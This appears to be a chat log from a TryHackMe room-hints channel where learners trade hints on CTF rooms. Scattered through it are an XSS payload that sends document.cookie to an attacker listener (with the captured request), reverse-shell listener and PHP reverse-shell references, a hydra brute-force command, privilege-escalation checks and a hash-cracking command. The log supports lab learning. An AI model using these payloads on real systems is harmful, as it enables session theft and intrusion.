#room-hints

Just took me some many attempts to realize that :)

ya looks that way, hehe LOT of trial and error fuzzing to find a filename like that

maybe if you examined the source and determined the method they use to randomize, you could probably narrow the possibilites to something more manageable

might even be 'predictable' based on how they implemented things

Hashid actually is claiming it's a hash. Curious to know if it's accurate... One sec

@forest robin wrong. Giving up on this one :)

lol, try crack the hash with fuzzing instead of a wordilst?

Hm? I know what the hash is. It's "test.txt" and I created a "wordlist" with that, but hashcat and john claim it's not a hash. hashid does. Whatever 🤷‍♂️

when you make a hash of a file, it uses the file contents not the file name

I did. Made a "wordlist.txt" and wrote "test.txt" in it

test.txt is the name of the file I uploaded

hrm..yeah echo "test.txt" | md5sum and nano test.txt (put string "test.txt" inside) then md5sum test.txt yields the same results

but that 'hash' from above is of your attachment which contains a reverse shell

so...to 'crack' it i would imagine you need to someone put the entire contents of the attachment in a wordlist? lol not sure how this would work

Why? Doesn't the server just hash the filename into this? I would by now think like you it's a random name, but hashid claimes it's a hash.

take a look at the squirrelmail source to see what its doing?

@forest robin I think by now I should have done this already.

Just downloaded it

as far as the server hashing the filename (the attachment) its more likely the contents of the file (attachment) is what is being hashed not the string that is the filename

I don't know how much I gain from this. When was the last time you saw Squirrelmail around? I just heard of it thanks to this room :-/

so if you put had an attachment called test.txt that contained the string test.txt...then had another email with another attachement called test.txt and this one contained a php rev shell. The hashes would be different even though the filenames are the same...due to the difference in content

lol this is very true

But I am sure Gmail works similar :))

but! whatever squirrelmail is doing, other web based mail things could also be doing it like that?

Well, I downloaded a few web email clients that are open-source. So, hopefully I can compare.

BTW, rooting this room was a fun thing. I couldn't get it tho myself.. I looked a bit around. I found the cronjob but didn't know what to do with that.

it was a tar * thing right?

Afterwards, I saw in GTFObins related stuff

ya when i got to that point and gtfobins as no help i googled:

Yeah, that wildcare thing

But then in GTFObins in tar under sudo I found the same idea, but at the beginning didn't know how to apply that...

tar exploits
and 1st hit was: https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

covers a few wildcard (*) exploits, but the tar exploit there worked for me

btw, how do you increase the number of lines to scroll in tmux? @forest robin I have a limit of 1900 or something

I changed it in the terminal settings but in tmux it did not change

in ~/.tmux.conf (which may not exist)

put this: set -g history-limit 10000

change that 10000 to whatever scrollback you want

oh, great, had a hard time with linpeas.sh

now, how to you quit pspy64 without losing the shell?

i also put this line: set -g allow-rename off

so tmux doesnt rename panes

i also remapped the default from ctrl+b to ctrl+o

as ctrl+b is among some other keyboard shortcuts for moving the cursor around in the terminal

ctrl+b to go back a char, ctrl+f to go forward a char, ctrl+a, ctrl+e to go beginning / end respectivly

alt+f, alt+b to go forward / back by word

alt+d to delete word

if you know emacs these are all emacs shorcuts

and they seem to work in all linux

does this work in a nc shell? can't move around with my cursor at all

nc shell those shorctuts will not work

in tmux ctrl+[ to start the 'editor' ? mode has a little yellow box in the upper right corner, then you can navigate around using emacs shortcuts

And is there a way of aborting pspy64 without losing the shell?!

copy / paste from that without using mouse

you dont upgrade your shell with that whole python -c import 'pty.spawn("/bin/bash")' ctrl+z, some other stuff to do

if you do that, then ctrl+c and ctrl+l etc work fine

isntead of killing the reverse shell

also try something called rlwrap

rlwrap nc -lvnp 4444, creates a more stable netcat, and things like up arrow to scroll through command history work

One sec, if a upgrade my shell, CTRL+C does not work for me, it kills my shell

great. installed now. I'll try it out next.

Sometimes the shell is telling me that "THEMES" or something not installed. Don't remember what. Occurs when running "clear"

probably something related to a config on the server

Hi all, I'm on overpass2, the last question(root flag) and am stuck. I read the hint and have looked through the pcap and the machine under james, but am missing the root back door. Any hints?

So I got it, but what does the ||-p|| flag do at ||./.suid_bash -p||, I ended up having to go to a walkthrough to get the -p and can't find what it means.

maybe opens shell as root

What man pages would I find that flag in?

I executed the || ./.suid_bash ||, but whoami was still james, only adding that -p allowed popped me into root

And I don't understand why.

-p privileged Script runs as "suid" (caution!) Source: https://tldp.org/LDP/abs/html/options.html

There was a discussion about this not long ago here.
#room-hints message
Hopefully, it helps.

nice box

Hello everybody im working on Scripting room in task 2 but i can't go through this is somebody who could help me or give me advice ?

Didn't you already asked that question 🤔 ?

Yes i did, but it isn't important already i found whole code i will copy and paste i will try understand every line of code

can anyone help with AoC3?
The AWS portion
What is the database password stored in Secrets Manager?

I listed the secrets

but can't find the value

the output

You have to specify the secret you want to retrieve the value from with a specific secretsmanager command.

Could not connect to the endpoint URL: "https://secretsmanager.us-north-1.amazonaws.com/"

welp

||us-north-1|| region just doesn't work for the secrets manager

it's like the region doesn't exist

Then it's either not existing or simply not the correct one

Use google to get a list of available regions

eh, task kinda misleading, found it

Mh, not sure what's misleading, but glad you found it.

Well, it's just supposed to be about cloud not gathering intelligence like the available regions

I mean if you don't know the available regions then you will have to look it up, there will be nearly always something you will have to look up and looking up the available regions doesn't seem to be a hard task, so 😄

true, just my lack of aws knowledge

Hi! I stuck at the task 6 question 1 in phising emails 1. Can I get a hint?

Yo @nocturne wyvern you on task26?

Yeeees!

Hi, in this challenge, https://tryhackme.com/room/owasptop10
In TASK 26, why do i have to run the python code to get the base64 of the reverse shell with python pickle ? Why cant i just create a bash reverse shell and turn that to base64 ?

Thats my question

@white salmon

Have you read the information provided properly? I want you to read it again and if you've got any confusion then you can hit me up later in the DMs

@nocturne wyvern

There is a reason for the exploit to be encoded

No that's fine

Its there in the instructions + the server stores it in encoded so reads it after decoding (executes it after decoding)

That i understood

But like why use python and all that

There has to be some specific reason to use python to get the payload

Oh I got it

Woah please tell me

Because the server is python

It needs to be a python object

The string needs to be a python object ?

Read up about the pickle library and when it's dangerous. There would be no reason for it to run bash code.

So the server is expecting an object

Yes exactly

Ok i will read

No. The string is the base64 representation of a serialised python object

That python object has a method defined which you put your payload in.

The cookie is retrieved and deserialized via pickle.loads as you can see the code is written in Python that means the server is also written in Python the validation and all that so to exploit this Python is used.

But in the python code, they are using bash to generate the reverse shell

:(

So i thought i might as well do that

The code was imported from sys library of python

This, how did you know that ?

1. You learn it through your app recon
2. You're told.

But if im not told, would it still be possible to guess what the cookie represented ?

We are using system commands to spawn a shell via python with the help of sys library

Alright it seems i got to do some reading

Perhaps, have you tried?
Usually, session cookies are just random bytes. Sometimes JWT are used which are signed JSON objects. If the encoded data looks to be something interesting and isn't random bytes or JWT, it's certainly something you should poke at more.

Alright thats it

Thanks

And i'll do some reading tomorrow

Hope i understand it fully

https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html this is a good read to learn more about sessions and handling them sensibly

Thanks for the link

Can someone tell me why in Common Linux Priv Esc its saying permission denied when I write to the passwd file?

Show us what you're doing

Q5: Now, simply add that entry to the end of the /etc/passwd file

Then says permissions denied.

SHOW us, screenshots. We don't know what you're doing, so we can't possibly tell you what you're doing wrong.

ok thanks

I got it was a mistake in switching to the root user. Thanks again

hey guys, doing the retro room and trying the ||hhupd|| and I get here (attached screenshot) but it doesn't open the browser

or doesn't let me choose the browser

I am using attackbox and xfreerdp

xfreerdp /u:redacted /p:redacted /v:10.10.177.221

welp, I just used a different exploit

What is the verification code for me to hack Bookface?

What steps did you take to find the verification code?

@graceful depot

I'm new to hacking, but I went to the Buertr force tool and didn't know what to do next

I tried to guess it but it didn't work

Can you help me?

Start at a room/module aimed at your skill level is the best advice available in this circumstance. @graceful depot

Funnily enough, the idea is that room is an intro to THM and hacking

I'll see when I get to that room I guess.
I just did the fundamentals rooms yesterday x'D

Not sure that it's in a path

nod

AoC3 was good at showing how to use a tool before asking you to use it.
Since I've started doing the normal rooms there's a lot more "Google it".

But with guidance on what you're looking for from Google, which is as useful as knowing the concepts, but not the tools honestly. So works well for people who want to understand what they're doing.

That last bit is what hacking is all about

How do I post the command I am suppose to use with out posting the answer in the chat?

You can post as a spoiler between a pair of pipes on either side || spoiled message ||
||Spoiler alert!||

ok thanks

Can someone tell me why my reverse shell from the crontab connected but I cant do any commands?

Tryed it again and it worked for some reason

Hmm, interesting, connection received, but it doesn't appear to be presenting a shell.
What command/attack script are you using to open the rsh?

LOL fair.

I'm having a heck of a time with meterpreter right now. Looks like your shelless nc receive every time -_-;'

worked lol

THM struggle is real but when it works its the best.

I use the attack box but gonna try open vpn soon

I hear its better

I tried to switch to the attackbox because my VPN box is where I'm having trouble, and I couldn't get the attackbox to load x'D

I wonder if AoC3 just has the usership spiked enough that we're exceeding expected resources.

Someone tried to give me a 1month subscription code, but it didn't work.

Firewall blocking?

THM is the best $10 I spent in years.

Yeah, I'm definitely going to subscribe.

They deserve the support.

Just wanted to get some of the low hanging fruit out of the way.

So here I am fighting with Blue.

I done DVWA app and few other courses but the walk through and explaining things is great on THM and the content is recent.

I've got all the flags, but I can't do the darn hash crack because I can't get meterpreter running.

try another hasher?

Thinking about it. If I can't do it the way the room wants, I'll have to figure out how to push mimikatz to the box.

Can always revisit a room later on and try again.

anyone familiar with the RootMe room?

That's true, but I'm a stubborn sucker 😄

All that fighting... I ran update && upgrade on my system, and it just bloody works when done.

I've done it a while ago. What's your question?

@white salmon Well, I seem to have a problem with getting nc to hear the request. I changed the script to both php5 and phtml, uploaded it to the panel, execute it form the uploads page, but I get an error failed to deamonnize etc. on the attackbox it stays as listening on the port. Tried switching ports on both the AB and in the scirpt..but to no avial.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111) tryhackme

Have you changed the IP in the .php script to the IP of the attacking machine?

yes sir.

Let me try it myself quickly.

changed both the IP and the port...changed the port several times

Even tho I am using a VM and not the AB.

principal is the same I'm sure

@unique oyster Should be. Let me try.

@unique oyster Just tried it and it works. Which .php script are you using?
I use https://github.com/pentestmonkey/php-reverse-shell

Did you launch the shell by visiting /uploads/yourfiles.name?

yup, thats the one I used as well. I first changed the php to php5 and uploaded successfully (after changing IP and port) then changed it to phtml. Visited uploads and clicked on myfile..then I get that error. Not sure what I am doing wrong..spent so much time on it that my box terminated. LOL

Sorry. Can't think of anything else. 🤷‍♂️ The extension does not really matter if it's php5 or phtml. Anything that does not get filtered should work.

And the nc listener is running before you clicked the reverse-shell file?

OK. I appreciate the assistance. I will have to try later today...gotta get ready to go to work. Yeah, had the nc listening before executing the code

@unique oyster OK. Have a good one.

Hi I need more hint room ctf100 flag 31 😦

@white salmon well, worked perfectly this afternoon...so, IDK. But I appreciate you looking into it. Thanks.

Gave +1 Rep to @versed shadow

Hi all, I'm in relevant and have gotten the ||passwords.txt|| and decoded them. I'm looking at ||https://www.exploit-db.com/exploits/44453||, but getting all kind of blockades since this is python2, can anyone tell me if I'm heading in the right direction?

Please don't ask the same question over #room-hints and #room-help at the same time. If you want a check of direction or a sanity check then ask here. #room-help is for when you've read the writeups and still need help.

Thanks for the clarification on the intended purpose for each room, will do so in the future.

Gave +1 Rep to @stuck fractal

I'm stuck on this question from BurpSuiteBasics Task13. Can i get a nudge? Thanks 🙂

Ah i was dumb, didn't read the Question carefullt, I got it 🙂

Hi guys having an issue with bloodhoun with no database

anyone encountered the same issue?

Thanks

Found the solution to this

Hi Guys, am in network room and trying to exploit SMB. I got logged in successfully but not sure how to read the files

pls someone guide me on this

You could for example try to download a specific file and then read it's contents in your usual cli

Guys, what do you do when chattr command is not found...

like i try to locate it but the only thing i gat is an archive like chattr1....gz

Then I think initiate a listing port in remote shell and then reverse shell it to my host to have access to the target to read. is that correct?

No, you can just use the available commands from smbclient to download the file.

https://tryhackme.com/room/ccpentesting
Anyone know which wordlist to use for the last question in Task 4?

have you read the man page??? if you have here is a hint on what to look at ||-x|| otherwise go read the man page

Yep I'm using -x right now

but the wordlist im using doesn't seem to have found anything yet

except the directory (second last question)

this is the command I'm using

i'll try the list from seclist

shadow sees a error

there is a missing .

bruh

one sec lemme try with .

we're only specifying extensions why they need a . too 😭

hmm this was without the .

this is with the .

i think it works without the . too

maybe ¯_(ツ)_/¯

with seclists 😔

ah found it with /usr/share/wordlists/dirb/common.txt

Hey everyone, I’m in room “The find command” and I’m stuck on Task 2, When trying to find all files whose name ends with “.xml”…. I’ve tried: find -type f “xml”, find -type f “.xml”, and with “-name” as well but I get a prompt saying that a path must precede the “.xml”, any hints please, nooby here trying to understand and learn commands 😁

hi guys why is crontab behaving like this?

crontab -l

@rancid estuary

oh thx

why is it?

crontab is an application you have to provide some option

@urban geyser try: find / -name "*.xml" -type f

but why it blocks when u dont pass an option

it just waits expecting some option, I guess, that you didn't provide

Could someone give a hint on how to get the root.txt in ccpentesting final exam?

I'm currently SSHed into a user account

so i'm assuming I need to escalate privileges

3/4 of the links they provided for linux privileges escalation in previous tasks are scripts and there's no internet access on the box

I'm about to read through the 4th one now

havent done that one yet, but:
find -type f -perm -u=s 2>/dev/null && sudo -l && cat /etc/crontab good place to start looking for privesc

What does that do? it listed a few files for me

a problem for tmrw, im gonna go rest now 😂

i cheated 😔

looked at a writeup, turns out it was something i overlooked earlier when i saw it in a file lol

@static gust find <where> flags
so the above command will find /=root directory -type f = only files, -perm -u=s = only suid files, 2>/dev/null redirect errors to dev null

# list files with SETUID bit set
# https://gtfobins.github.io/#+suid
find / -type f -perm -u=s 2>/dev/null

# check if you are allowed to run a command as `root` or any other user
# see how `sudoers` file/configuration works
sudo -l

# list cron jobs
# globally configured, there are `/etc/cron.*` directories as well
cat /etc/crontab
# for current user
crontab -l

those 3 commands i always do when getting a shell on a box, can sometimes privesc without having to do linpeas or other enumerations

i also like to do cd /home && find . -readable (it will show me any readable files recursivly from /home)

Ah I see, thanks

earlier when i first sshed into it

i ran ls -a and saw a file called .bash_history

in it was was three commands, one being sudo su

but i ignored it

u cant ignore sudo su 😂

if you check sudo -l it shows that you can run su without password

💀

why lol, that is probably the privesc

yeah it was, i later found out when i checked a write up

sudo -l

sometimes /etc/passwd and perm with suid bit set and gtfo bins are the ways usually in these challanges

i tried checking /etc/passwd and /etc/shadow but had no perms 😔

in passwd you sometimes have luck and stored hashes 😄

Yeah I thought maybe it wanted me to try crack them

but thats how i got access to the user acc in the first place

in crontab orsome other indirect read of etc shadow and then crack hashes or just add your own root user is easier then cracking the hashes

what room?

/ccpentesting

so you logged in as nyan ?

i have poor notes on that one, but it was very fun i neeed to do it again someday

but run the linpeas it will help

but you already know the privesc path? sudo su without a password or did i misunderstand you?

Anyone else have problem with room Introduction to Django, unit 5 CTF, Hidden flag? Both flags for Admin panel and User work fine, but not the third flag. Even looked into writeups to be sure that I found the correct flag, but it is still not accepted.

Edit: Bad resolution didn't render the characters really well. Now I got the flag approved correctly.

🙌🏽 awesome thank you!!

Gave +1 Rep to @forest robin

Hi I've been having troubles with getting the flag for the authentication bypass room

The answer says that there is a flag in Roberts support ticket but I haven't found one there

I've also tried modifying his account details to see if I can log in but it didn't allow me to

So you talking about task 4 ?

Yes I should've specified that

So did you create an account ?

Yes

And you received the password reset mail to that account?

Yes

Can't remember correctly, but in that password reset mail, do you have to set the password for roberts account or is the flag already in that password reset mail ?

The answer says that the flag is in Roberts support ticket

Either way I've tried both

Could you show me a screen of that password rest mail/ticket you received ?

And after you navigate to that url, you can set the password for roberts account, right ?

Yes

I set it and then it returned an error that there's a wrong username or pass

When trying to sign in to the account

Could you send me that link and I try it myself ? If you want me to.

Link is: http://10.10.163.16/customers/reset/3f3b7e64393207c4c9d40f52a0588172

I'll also terminate the machine in case it interferes with your try

Wait what ? If you terminate the machine I can't try it ^^

...

One sec

Ye, let me know when you are back at that point where you received the reset mail. In case it's again not working let me know, but this time don't terminate the machine then 😄

Issue might've resolved itself I don't know why but this time it worked

Alright 🙂

Thank you anyways though, I thought I was doing something wrong

Gave +1 Rep to @left thunder

Hello guys

Hope you’re are having an amazing festive season

Thanks! it took me a day to figure out that smb cmd executes in binary and we need to include filename having space in quotes "file name" 😩 😫 painful

Gave +1 Rep to @left thunder

Hi can someone gimme a hint of how to solve Q4 What is the content of the flagUSP.txt file?

please

As there are no designated channels for every room, it's always helpful/necessary to post the name of the room you are in.

Windows Privesc

task 6

I'm doing https://tryhackme.com/room/gatekeeper and I downloaded the gatekeeper.exe to analyze it locally. I have loaded it in my windows VM and into IDA64. I have found the offset for the buffer overflow but I can't debug further because the program uses a thread to handle the payload and IDA doesn't break on the bad EIP. how can I debug the program, view the memory of the thread, etc?

same with immunity. it just keeps running. it tells me about the access violation and then just keeps on going because it's a thread

well i managed it with immunity. what a slog

I'm having problems with the SSRF room takes 5

My base 64 encoding is displaying a flag

https://tryhackme.com/room/relevant doing this room i got the credentials of user but idk where to use those credentials HELPPLEASE!!!!

i am still stuck in the same situation

Hello fellow community members. I am completing the https://tryhackme.com/room/xss but got stuck on the KeyLogger section. Can't seem to make the script log the key presses on the /logs/ page. Any hints/help would be highly appreciated. Ty

Heyoo
I am stuck trying to ssh into the vm in the nmap room. Could anyone provide me the user and password for it? If there is any other way to tackle the practical answers do let me know. I have tried using ssh "tryhackme@{machine-ip}", "root@{machine-ip}" and "{machine-ip}"

ofc all in separate commands^

Link to that room?

https://tryhackme.com/room/furthernmap#

Heya, I wanted help on XSS room. i'm at the last task, i'm giving the correct payload, but it dosen't seem to be working

Task?

the practical questions...I am trying to connect to the virtual machine thru my local machines terminal(macos)

task 14 to be precise

@rotund pier these?

yes

Are you trying to SSH to the AttackBox?

no not the AttackBox

the deployed machine i started in task 1

Hm. I don't see why would you need to SSH. Which question are you trying to answer?!

Ya, there's no need of it!

Well i need a linux based terminal to use modules like icmp and nmap so do i host a vbox and tackle those questions?

1. True.
2. Unless you have the credentials, you can not SSH to the deployed machine. And you do not have the credentials.
3. Therefore, or use the AttackBox or run a Linux distro in a local Virtual Machine. Or, SSH to the AttackBox.

ok makes sense thanks

Good morning

Can someone help me with a question located on Windows Fundamentals 1 room

its this one

Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

Answer format: ****** ******

Answer format: xxxxxx xxxxxx

@inland onyx

Thanks.

Could you post a screenshot or alternatively provide a link to that room?

https://tryhackme.com/room/windowsfundamentals1xbx

It's the last question from the task 3

Since you are looking for just a hint, perhaps try to go to Task Bar settings by right-clicking on it and then choose "Which icons appear on the taskbar"
It's just a guess of mine.

Haven't Windows installed in front of me now, but I got the idea by looking at the room where they have a screenshot of such a menu.

I did it, but i still havent found the answer :C

All the icons that I found dont match, battery power, keyboard language

I am sorry, I don't have Windows in front of me. Try right-clicking on them and get some more information. If you want a hint: It starts with an ||A||

found it!

Wow! How?

Thanks @white salmon!

Gave +1 Rep to @versed shadow

i research trough microsoft documentation

But i only found it with ur hint haha

Doesn't matter :) Great job. Keep it coming.

Room: Madness: https://tryhackme.com/room/madness , it is not possible to connect through SSH using credentials found. Did anyone solved recently this room to confirm if it worked lately ? I have the right credentials as i verified different writeups and it appears that i had used the correct credentials...but for some reason the machine do not accept them. Tried to restart 2-3 times but same results 😦

Can you please add -v to your command and post the error message here?

i found the problem(a typo), thank you for your availability

Gave +1 Rep to @versed shadow

hi, is it possible to get root shell in Vulnversity room, instead of just 'cat'-ing the flag? edit: got it!

Can I get a hint for the room: "Hacking with Powershell". I'm stuck on Task 4: "Find the contents of a backup file"
I tried using this powershell command to look for all files on the C-drive that contain the word backup:
get-childitem -path C:\ -recurse -force -erroraction silentlycontinue -filter 'backup*'

also the walkthrough link on that same room isnt working

Hey,I'm doing the Jr. Penetration path's XSS room and in the last question I'm a bit stuck. The final question is : What is the value of the staff-session cookie?. I'm providing the payload I'm using which receives the cookie in the listener on my machine i've set up and after decoding the value and posting it it still keeps saying wrong answer. 😦

My payload is </textarea><script>fetch('http://10.14.17.24:9001?cookie=' + btoa(document.cookie) );</script>

In the listener i've got a hit

connect to [10.14.17.24] from (UNKNOWN) [10.14.17.24] 47790
GET /?cookie=c2Vzc2lvbj1jMjAwMThkYTcyM2U5NGY2OGM5M2Y4NmU4NmRjMGU0OQ== HTTP/1.1
Host: 10.14.17.24:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.40.71/
Origin: http://10.10.40.71
Connection: keep-alive

that cookie decodes to session=c20018da723e94f68c93f86e86dc0e49

and i still get "Uh-oh! Your answer is incorrect."

I'm doing that room just now

i hope it works for you

room is very well explained

but i keep hitting the wall with that final question

Nah, I can't find the second passphrase. 😂

I'm stuck on one of the learning rooms. I'm doing question "[Severity 8] Insecure Deserialization" in https://tryhackme.com/room/owasptop10, but I have no clue whatsoever where I should find the name.

Could you specify which question

Ah, task 21 "[Severity 8] Insecure Deserialization"

I think I'm overthinking it.

I'm guessing you are looking for who developed tomcat?

would that be it? It says "The tomcat application", so I'm assuming that the box you can deploy is a tomcat application.

I can try that. Hold on.

You know you can google stuff right?

This is a research question

The question is formulated weirdly, and there is a box.

I assume that's for the tasks below

Just search "who developed the tomcat application" and your answers will be in bold on the top of your page

Yeah I guess I shouldnt have assumed that it wasnt that simple.

My bad )

Yeah I already know the answer now, just didnt figure it would that.

Thanks though.

Starting to wonder how long I should be waiting with Crack the hash, Level 2, hash 3... Anyone done this one?

I don't remember how long this took me, but I read once that as a rule for devs of rooms, it should not take more than 5 minutes.

https://tenor.com/view/depressed-bored-boredom-swing-head-gif-17224602

20 min and counting... Time for some Halo.

If it takes more than 5 min with rockyou.txt you are probably doing it wrong

John or hashcat?

hashcat

-m ???

1hr and 11 min.

-m 1800... goinna run it on my desktop and see how long it takes. Probably my anemic laptop

running hashcat in VM?

Uh oh

Lmao

bare metal 2010 macbook pro

That was a test of my patience

hashcat can work faster with the help of a gpu too

I see the issue now, and it's a major off topic answer. Apple and their EFI issues make the GPU inaccessible to me.

Spoiler:
#bot-commands message

@quick nimbus But good to know :) @alpine kestrel

Im trying to run metasploit for the ToolsRUs room

Im deploying an exploit

but a session isnt generating

I ensured my HttpPassword, User, Rport, and rhost is set correctly

Then i run the exploit

Then i get a message saying "Exploit completed but no session was created

Solved it meanwhile ?

I gave up haha😅 will revisit tmr

I’d post an image if I had perms

Verify your THM profile and you'll be able to post screens in here.

!docs verify

Hey guys, I was doing phising email 1 room in tryhackme, I am not able to decode the base64 email2.txt file, maybe I am copy pasting the wrong data, can anyone help me ?

Which task are you on?

Look at the format of the file name

not the actual .txt but inside of the .txt file

Just a little update from yesterday. Got Nvidia Cuda tools installed on my windows box, and ran hashcat there. 71min on the craptop vs 32 seconds on the desktop.

/join #deleted-channel

"What hash format are modern Windows login passwords stored in?"

i dont quite understand this question

i wrote an NT or LM hash and it gave incorrect

LM -> NTLM -> NTLMv2

It's worth understanding the differences because they make defense and penetration very different.

ohh

thanks

Anyone doing MLSC CTF? I want a hint on 3rd task since I found somewhat that looks like flag format while researching, but the string I found ain't a valid one to complete the task..

May I ask how ta make pickle work cause Ive download the pickle files and I have only this I don,t understand how to configure it for OWASP top 10

I think you downloaded the wrong stuff. The actual code for that task is on the github page when you click on the revision tab and scroll down a bit. It's not intended to be like that, but at least you can find it there.

But I've click on the OWASP top 10 link directly for the pickle file...

why I got something else

https://gist.github.com/CMNatic/af5c19a8d77b4f5d8171340b9c560fc3I find this on github noting else when I click on the link they said to click

sorry wrong link

thi is why Ive modify

As I said, follow the link in the room, then click on the "revisions" tab and scroll down a bit

ok I'll search again :S

I just need the rce.py ?

Yes

ok good it work now I was so confuse

thx

Gave +1 Rep to @left thunder

I finished that room last night, it's a good room.

I did find a flag I can't put anywhere in the room, so I wonder if the website is used for a different room task.

I tried asking Ben, but he's never around.

Which site of that room you mean, the juice shop ?

In case the juice shop is even in there ^^

Nah, it was the website where you used the cookies to log in as admin.

With the message from Tony the Tiger.

Or the flag for answering the quizz too

It goes nowhere

^ That's the one I was asking.

Oh sorry xD

I got that flag, couldn't find an input, so I was wondering if it was scrapped or goes elsewhere.

Probably scrapped

Or it's an easter egg

@inland cargo ok i give up 😂

can you give me a hint for pickle rick

i've got the username

just dont know where to go with it next

tried ||ssh but it showed i need public key||

Haha one sec, share me the room link

https://tryhackme.com/room/picklerick

Okay great, can you show me the command you used for your nmap scan?

nmap -sV [ip]

Okay and which ports were open?

||80 and 22||

Lets try this nmap -sCV -T4 $IP -p 22,80

Hmm okay and did you do a dirbuster scan?

i tried gobuster

using dirbuster/directory-list-1.0.txt word list

found ||/assets||

And what extensions were you looking for?

oh i was only checking directories with that command, i also tried using /dirb/common.txt for .pub files

I normally add html,txt,php if it's running php.

hmm I'll try those and let you know if i find anything

ah found something

thank you

found a ||login.php|| i'll try this on my own

@inland cargo oh one more thing, is there a way to load rockyou into burpsuite without it crashing lol

or maybe i should try hydra, iirc it can do post requests too

Ye I don't use burp for bruteforcing

Also you want to look for files too, just not dirs

i tried for .pub cause i saw ssh required a public key

but i didnt think about php and other files

@inland cargo Could you let me know if the following syntax is correct?
I'd rather not wait 78 hours of bruteforcing with rockyou to find out 😂
||hydra -l $USERNAME -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php/:username=^USER^&password=^PASS^&sub=Login:S=Incorrect"||

Okay, you tried bruteforcing, let's go back to enum.

Have you tried nikto?

im bruteforcing atm

7 minutes in

no

7+ minutes in

not sure exactly how long its been

15 mins*

tried 185k passes so far

i'll try that now

Bruteforcing is not that path forward

is it simply nikto -host [ip] ?

or do i need other options

Yup

okay, running rn

still running hydra for now just in case, i'll stop it at 20 mins or smth

might try sqlmap next on the login page

nikto didnt seem to find anything new

sqlmap didnt find anything either

simply did sqlmap -u [ip] --forms

think i might just give up on this one and go for an easier one, probably toolsrus

and come back to it when im more experienced

Did you add the extensions like I asked?

extensions to where?

gobuster?

Yup

i found a login page with it

already have the username

just no pass

You still need a pass, you tried bruteforcing but that's not the way

seems so

So let's enumerate some more

Show me your gobuster command

gobuster dir -u ip -w /usr/share/wordlists/dirb/common.txt -x html,txt,php

And the gobuster output?

||/.hta (Status: 403) [Size: 291]
/.hta.html (Status: 403) [Size: 296]
/.hta.txt (Status: 403) [Size: 295]
/.htaccess (Status: 403) [Size: 296]
/.hta.php (Status: 403) [Size: 295]
/.htpasswd.php (Status: 403) [Size: 300]
/.htaccess.html (Status: 403) [Size: 301]
/.htpasswd (Status: 403) [Size: 296]
/.htaccess.txt (Status: 403) [Size: 300]
/.htpasswd.html (Status: 403) [Size: 301]
/.htaccess.php (Status: 403) [Size: 300]
/.htpasswd.txt (Status: 403) [Size: 300]
/assets (Status: 301) [Size: 313] [--> http://10.10.38.210/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 300]||

robots.txt 👀

oh crap

i seen smth there before

Should always check that out for a web server.

didnt try it as pass tho

._.

that was the pass

S=Incorrect seems wrong to me, you're indicating that "Incorrect" should appear in the event of a Success...

room dev rules state that any bruteforcing should take no more than 5 minutes on the attackbox

Ah I see

oops

Ah yes, it should have been F=incorrect

My B, didn't spot that earlier.

make sure you get the case right

odd, s=incorrect should have found it on the first pass then

it's bloody finicky

crap i broke it

happens

ok fixed

time for the final answerr

glhf

😄

hey, can someone please help me with phishing email 1?

i decoded the text but i cannot find a flag

nevermind

Can I pm someone about the third flag (binary exploit) on theseus? I have it working locally but I'm having trouble getting it to work on labyrinth. even set up a tunnel to run pwntools 'locally' on the machine and it's still not working.

I can try to help if youre down

I literally just got it working after many hours of frustration. Thank you though!

Gave +1 Rep to @terse eagle

can I DM you for some help with the room? haha

Sure thing 🙂

If it's the th**** binary you don't have to use binex to get past this!

Wait really, I ended up doing binexp, mind pmming me? Would be curious to know what the other routes were

Sure, PM if you want.

Hello there. For a school project I have to do some "basic" hacks on a website. After using nmap on the site to check opened ports, I found 3 diferents ports wich they all give me an auth request with username and password that I don't have obviously, any tips ?

So it's not for a room on THM ?

sounds sus

it is but on a secret room I guess

So what's the link to that room ?

👀

https://tryhackme.com/room/thebindingofcyber

Hmm, hard to tell if it's really for a "school project" or for something else ^^ .. So dunno.

It is, I can prove you in PM if you want

Sure why not, I'm happy to help if it's for legit purpose 🙂

having issue with john

trying to crack simple LM hash

john --show jon_hash 
Jon::1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

1 password hash cracked, 0 left```

I use rockyou and as the hint says, the pass is in there

question is why john fools me that he cracked it

john --wordlist=/usr/share/wordlists/rockyou.txt --format=LM jon_hash

try cracking just the hashes without the colons and all that

like aad3b435b51404eeaad3b435b51404ee
ffb43f0de35be4d9917ac0cc8ad57f8d

root@kali:/home/nism0/THM# cat jon_hash 
aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d
root@kali:/home/nism0/THM# rm ~/.john/john.pot
root@kali:/home/nism0/THM# john --wordlist=/usr/share/wordlists/rockyou.txt --format=LM jon_hash 
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 2 password hashes with no different salts (LM [DES 256/256 AVX2])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-01-03 15:23) 0g/s 9990Kp/s 9990Kc/s 19980KC/s !!1QWER..*7¡VA
Session completed. 
root@kali:/home/nism0/THM# john --show jon_hash 
0 password hashes cracked, 2 left
root@kali:/home/nism0/THM# 

btw - afair john had no such issues before with that format

like here

https://medium.com/secstudent/using-john-the-ripper-with-lm-hashes-f757bd4fb094

I meant crack individual hashes

not combined with :

anywho ||hashcat -m 1000 -a 0 ffb43f0de35be4d9917ac0cc8ad57f8d rockyou.txt|| should do the trick

frankly, I prefer hashcat over john, but I'm on vm at work so no hashcat here

oic

ntlm hashes are usually easy to crack

www.crackstation.net might work

yup. I did full upgrade last time so maybe it broke john somehow

